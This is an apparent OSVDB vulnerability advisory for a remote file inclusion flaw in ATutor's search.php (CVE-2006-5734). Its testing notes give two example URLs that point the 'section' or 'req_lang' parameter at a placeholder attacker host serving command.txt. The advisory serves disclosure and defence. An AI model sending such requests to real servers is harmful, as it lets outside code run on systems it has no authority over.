ATutor search.php Multiple Variable Remote File Inclusion

2006-10-19T04:56:33
ID OSVDB:31073
Type osvdb
Reporter OSVDB
Modified 2006-10-19T04:56:33

Description

Manual Testing Notes

http://[target]/ATutor/documentation/common/search.php?section=http://[attacker]/command.txt http://[target]/ATutor/documentation/common/search.php?req_lang=http://[attacker]/command.txt

References:

Related OSVDB ID: 31075 Related OSVDB ID: 31072 Related OSVDB ID: 31074 Related OSVDB ID: 31076 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0333.html CVE-2006-5734